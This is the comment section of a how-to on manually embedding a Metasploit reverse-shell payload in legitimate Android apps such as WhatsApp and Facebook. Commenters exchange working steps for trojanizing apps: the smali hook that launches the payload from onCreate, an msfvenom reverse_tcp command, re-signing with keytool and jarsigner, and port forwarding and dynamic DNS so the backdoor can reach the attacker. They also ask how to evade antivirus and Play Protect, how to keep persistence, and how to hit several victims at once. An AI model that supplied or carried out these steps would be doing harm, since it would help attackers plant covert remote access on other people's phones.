How To: Embed a Metasploit Payload in an Original .Apk File | Part 2 – Do It Manually

Answers to a Few Problems

NOT RECEIVING CONNECTION TO VICTIMS DEVICE- make sure postgresql is started before you start metasploit, firewalls can also block the connection from happening.

SIGNING APKS- use this in the kali linux terminal:
For generating the keystore:
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
For singing the App:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore myapplication.apk aliasname
DIFFERENT PORTS YOU CAN USE FOR REVERSE_TCP-
port 443
port 4444
port 5555?

Apktool has changed lot now. It looks totally different from the screen I see. So I went to the link and download the apktool. So copy and past apktool d -f -o etc and got this below

Apktool v1.5.2 - a tool for re engineering Android apk etc.
ETC ETC long list

I don't know what to do afterwards. Basically I am struck on Step 2 sir. can you help me?

Get the newer version of Apktool from http://ibotpeaches.github.io/Apktool/install/. Don't try to get the upgrade from the Terminal with apt-get, it doesn't get the newer 2.1.1 version. You've to do it yourself.

I have the same problem.please help me.

Don't open apktool by clicking its icon or by typing apktool...
Directly issue the commands to terminal....It will do as desired

nice tut , can you post on how to hack android devices, via text messaging

WHAT IF I INSERT PAYLOAD INTO WHATSAPP ORIGINAL APK FILE.

DOES PLAY STORE SHOW UPDATE OF THE WHATSAPP APPLICATION AFTER INSTALLING IT ON THE PHONE OR DOES WHATSAPP END SERVICE OF THE OLDER VERSION OF THE WHATSAPP OR WHEN USER UNINSTALL THE APPLICATION STILL CAN I GET THE BACKDOOR IN THE ANDROID?

Probably Playstore updates won't work, because it's not signed using the original key. And the backdoor won't remain if you uninstall the app.

Hei guys how to fix this
jarsigner error: java.lang.RuntimeException: keystore load: /root/.android/debug.keystore (No such file or directory)

waiting for the answer -,-

you may have to reinstall jarsigner...

Alright I've signed it. The only problem is now, it doesn't work on phone's data network over WAN.

https://null-byte.wonderhowto.com/forum/metasploit-doesnt-work-mobile-data-network-0167465/

I have the same problem, it works on LAN but when I try on WAN just open de app and when metasploit try to connect the app Stop "Unfortunatly APP has stopped"

Are you using the latest APKTool? Have you tried it with other APKs?

I'm wondering if the same method could be used on other rat type apk's to backdoor a legit app

The method would be similar, but not same. You have to modify it a bit.

Can you explain how to do that pls ?

could you upload a picture of injected code in .smeli

if we Embed a Metasploit Payload in an Original Apk File it will be detected by any anti virus or not ??
plese tell me how to make it undetectable by any anti virus

i did the instruction but when i install the app it shows me not responding error

Is there any way to make this persistent? Create a bash script that every x seconds runs the application of which we have embedded the payload. This way we keep a session even though the user has not runned the application in a long long time.

Here is what I mean: https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/

actually i solved that problem and it's working fine now, it says that it can't find the keystore so we must make one and then we can use that to sign the apk

Can you explain how to do that pls ? :/

hi i tried that and i created a key but when i use jarsigner here is my out put ... :

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA /root/original/dist/com.piriform.ccleaner-v1.10.38-71411038-minAPI15.apk aliasname

jarsigner error: java.lang.RuntimeException: keystore load: /root/.android/debug.keystore (No such file or directory)

I am sharing a help in downward,sorry for bad english

Package error for
apt-get install lib32stdc++6 lib32ncurses5 lib32z1_
These are the errors--
E: Package 'lib32stdc++6' has no installation candidate
E: Package 'lib32ncurses5' has no installation candidate
E: Unable to locate package lib32z1_

rr:1 http://http.kali.org/kali kali-rolling/main amd64 libc6-i386 amd64 2.22-7
404 Not Found
E: Failed to fetch http://http.kali.org/kali/pool/main/g/glibc/libc6-i386_2.22-7_amd64.deb 404 Not Found

E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?

what to do now

For me work without 32
apt-get install libstdc++6 libncurses5 libz1
not
apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Hi
why when i finally want to install the app on my android device my android device shows this error:
there was a problem parsing the package
I'm already tick allow installation unknown sources in phone settings.

I have the same error, found a fix yet?

apk need to be signed

would some kind of clock app be best? Since it would have full cmos access. Or the splash screen on startup, like the TracFone alcatel logo, that starts right at boot.

Just tossing out a random thought. A lot of the stuff I get intuitively actually works, I think on a 5 to 1 ratio.

ok so i installed the hacked app it is facebook. is there a way that i can get the app to run normally but still have the backdoor access? cause it gets the backdoor but then crashes

Great tutorial! Managed to get through it and its working with the popular app called "Color Switch" :)

my payload "invoke-static {p0}, Lcom / Metasploit / stage / payload; -> start (Landroid / content / context;) V" instead of going to another code =

.la 11 new-instance v0 Landroid / content / Intent; const-class v1 Lcom / Metasploit / stage / mainservi by; invoke-director {v0, p0, v1} Landroid / content / Intent; -> <init> (Landroid / content / context; Ljav / lang / class;) V invoke-virtual {p0, v0}Lcom/metasploit/stage/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;

How do I çözbil gave error when I add this code
meterpret command I use =
msfveno -p android / meterpret is / reversetcp LHOST = ipaddress PORT = 80 o /root/meterpreter.apk

I followed the instructions and made a poisoned apk. However, I tried on different android phones and although the original app works, the payload does not work and a meterpreter session cannot be opened. I tried a lot of different combinations and permutations and i could not work. Can anyone offer a solution to this problem. I would appreciate it.

W: Could not decode attr value, using undecoded value instead: ns=android, name=layout_width, value=0x00000001

help me

1. I see this as a really fast way to root my own phones. So basically I would only have to put in a command to su and then changeroot permanently. I had some maybe bad info that android passwords can contain up to 256 characters. I could do a lot with that. That and the phones are better as computers than as phones. But to install Kali or Li'l Debbie on it needs root.
2. could y'all please put some kind of buffer at the bottom of the page between say, oh, perhaps the editor function to add a comment, and the advert just below? By "y'all" I refer to whoever maintains the site and/or knows the maintainer well enough to ask.

jarsigner error: java.security.SignatureException: private key algorithm is not compatible with signature algorithm
plz help

install java 1.8 make it default , and use apktool version 2.2.0 ( this version works fines )
make sure that apktool could recompile tha app without any changes first

then make your edit and build your app, should work fine

how can I create persistence backdoor after binding file

I was able to get the meterpreter to work , but the original application shows blank screen. how to make the original apk to work and also the meterpreter to be connected.

try build a different apk

Sir, please help.
The code is displaying error:
jarsigner error: java.lang.RuntimeException: keystore load: /root/.android/debug.keystore (No such file or directory)

put your build apk in the same folder with the sign.jar tool

go to the sign.jar foler

execute that command
java -jar signapk.jar certificate.pem key.pk8 injected.apk singed.apk

injected.apk = your build apk

singe.apk = you output singed apk name

You have to create a keystore... For signing the apk ...the step is skipped in above procedures...i just made up this....

Put this code and then the above code with some change

Parsa Cloner posted about how to fix this key signing error. Here is a link to Stackoverflow on generating a key.

How can we attack on 2 or more than 2 devices at the same time

i think yes, by making every victim has special port in the payload and the listener

Hey I'm still trying but no success! Please if someone knows the answer, help me!

what is the problem exactly ?

Everything working fine bro but jarsigner not working

open it with gedit editor in linux , it'll open without any issue

It is wrong file

did you try opening the file from terminal using nano/vim

Connection not establishing, after completing installation, app run as original and no connection with meterpreter

i assume you hook the payload in the wrong activite , make sure you know the main activity that works first in the original apk manifest and inject that line

nvoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

make sure you find the that line ->onCreate(Landroid/os/Bundle;)V and paste under it the payload

make sure u make portforwarding, are you trying to exploit the phone in your same network or outside network ??

App throws up error while opening on Android Marshmallow when i add this below hook.Installs fine!!
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Plz look at screenshots.
I have pasted next to it, nextline also.
Nothing works!!
can you plz suggest what to do?

I found the solution! I have to copy all .smali files from payload.Not only the files which contains the word payload.

Thanx for the great tutotial !!

it should work without copying all the payload smali files, but anyway congratulations for exploiting

manjunath kar
thanks....... you have save my day...i had same problem. so i did same as you told and now app work perfectly....

I found the solution! I have to copy all .smali files from payload.Not only the files which contains the word payload.

use this tutorial https://youtu.be/ch_EWebwhB8

Very awesome tutorial,
contrary to that, if you know how to embed windows payloads into video file formats, could you make a tutorial on that.

UPDATE: This post is outdated, the latest version with the correct links and updated instructions can be found UPDATE: This post is outdated, the latest version with the correct links and updated instructions can be found at my blog, here - https://techkernel.wordpress.com/2015/12/19/embed-metasploit-payload-in-apk-manually/

i got same problem
what 2 do?
did u get u r ans

PLEASE HELP..IT HAPPENS EVERYTIME I TRY TO INJECT A PAYLOAD IN AN APP LIKE WHATSAPP.

Dude, it doesn't work if victim is using mobile data :/

Get a solution for that.

how to do this step?

1?If you are going to perform this attack over the Internet, you have to use your public IP address, and configure your router properly (set up port forwarding) so that your system is accessible from the Internet.

THANK YOU!

and why scan is all denied?

hi every one. i have a problem . i want to bind my apk , but i dont know how i mean How to combine my apk with another apk such as Telegram?

pleas help me ,I got crazy :(

i have a problem not mentioned in the comment section below.
everything works great for me EXCEPT my IP that changes all the time
how you did guyz to fix that problem
i don't want to keep creating the app everytime with a new public IP
so plz help me how can i change my ip from dynamic to static
i think it's that how they call it

The best way is using a DNS service. dtDNS it's free. You just need to create an account, and then to select a hostname. Then, where you used to use your ip (xxx.xxx.xx.xxx) just enter your hostname (abcd.azby.com).

I'm encountering the following error while trying to re compile whatsapk (latest version). Using the latest version of the apktool on kali 2017.2

Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): p, --min-sdk-version, 15, --target-sdk-version, 25, --version-code, 452018, --version-name, 2.17.351, --no-version-vectors, -F, /tmp/APKTOOL4795504688867751851.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/wrkdir/payload/decompiled/original/res, -M, /root/wrkdir/payload/decompiled/original/AndroidManifest.xml

at brut.androlib.Androlib.buildResourcesFull(Androlib.java:485)
at brut.androlib.Androlib.buildResources(Androlib.java:419)
at brut.androlib.Androlib.build(Androlib.java:318)
at brut.androlib.Androlib.build(Androlib.java:270)
at brut.apktool.Main.cmdBuild(Main.java:224)

Same doubt

You are Really a Genius Guy.....!!!!!!!!!!!!!!!!

1/ I create a key using
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
2/ signed using
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore myapplication.apk aliasname
THE PROBLEM
1/the app won t start in the phone
2/ ther is no exploiting (i haven t detect any thing in my PC)
please help i am trying to solve this problem in 3 days without result

tnx, but i have problem in step 6 this command don't make dist directory
my VPS os ubuntu 14.04
plz

The dist directory was not created does anyone have a solution or explanation ?

: Could not get lock /var/lib/dpkg/lock-frontend - open (11: Resource temporarily unavailable)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), is another process using it?

apktool b (dir) -o output.apk
I: Using Apktool 2.3.4
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...

S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable

W: aapt: brut.common.BrutException: 32 bit OS detected. No 32 bit binaries available. (defaulting to $PATH binary)

brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 127): aapt, p, --forced-package-id, 127, --min-sdk-version, 14, --target-sdk-version, 27, --version-code, 145, --version-name, 11.4.1, --no-version-vectors, -F, /tmp/APKTOOL10457475416347065996.tmp, -0, png, -0, arsc, -I, /tmp/1.apk, -S, /usr/local/bin/ucmini/res, -M, /usr/local/bin/ucmini/AndroidManifest.xml

facing this problem

Hi chicar work with original program close meterpreter codes

I have create my Backdoored original apk but when install it on the victim mobile The Error shows which the Apk is Blocked from playprotect . How to I recovered from that Error . I hope the reply will come ASAP!!!.

hlo sir your blog is so informative and valuabe

but i get stuck ......
plz solve my error i alredy tried my best and installed the latest apktool still giving me this eroor...

i m eagerly waiting for ur suggestions....

cant dump sms and anything
only app_list is working

the recompiled apk is not installing on my phone and says : Application not installed

Can anyone help me to resolve below issue...

this happens if you de-compile the res file, you have to add the -r parameter to the decompiling command

I followed the tut to the letter, after uploading the app to my phone and attempt to install I get the following error "There was a problem parsing the package."

Is there any solution to this ? or what could have gone wrong ?

It worked!
Thanks.
How to ask the user to grant permissions when installing? or while using the app?

amezon link not open also this link expired for adaptor

I cant find the html code

$ apktool b ~/root/original
Picked up JAVAOPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I: Using Apktool 2.5.0-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...

W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/linux/aapt_64 (defaulting to $PATH binary)

W: res/drawable-v21/$avdhidepassword_0.xml: Invalid file name: must contain only a-z0-9_.
W: res/drawable-v21/$avdhidepassword_1.xml: Invalid file name: must contain only a-z0-9_.
W: res/drawable-v21/$avdhidepassword_2.xml: Invalid file name: must contain only a-z0-9_.
W: res/drawable-v21/$avdshowpassword_0.xml: Invalid file name: must contain only a-z0-9_.
W: res/drawable-v21/$avdshowpassword_1.xml: Invalid file name: must contain only a-z0-9_.
W: res/drawable-v21/$avdshowpassword_2.xml: Invalid file name: must contain only a-z0-9_.

brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): aapt, p, --min-sdk-version, 16, --target-sdk-version, 28, --version-code, 30, --version-name, 2.9, --no-version-vectors, -F, /tmp/APKTOOL12135954410976257764.tmp, -0, resources.arsc, -0, META-INF/android.arch.core_runtime.version, -0, META-INF/android.arch.lifecycle_livedata-core.version, -0, META-INF/android.arch.lifecycle_livedata.version, -0, META-INF/android.arch.lifecycle_runtime.version, -0, META-INF/android.arch.lifecycle_viewmodel.version, -0, META-INF/android.support.design_material.version, - ...

Hey! i completed every step as directed but now i'm facing this error that says

"App not installed as package appears to be invalid"

please help me , I will be very thankfull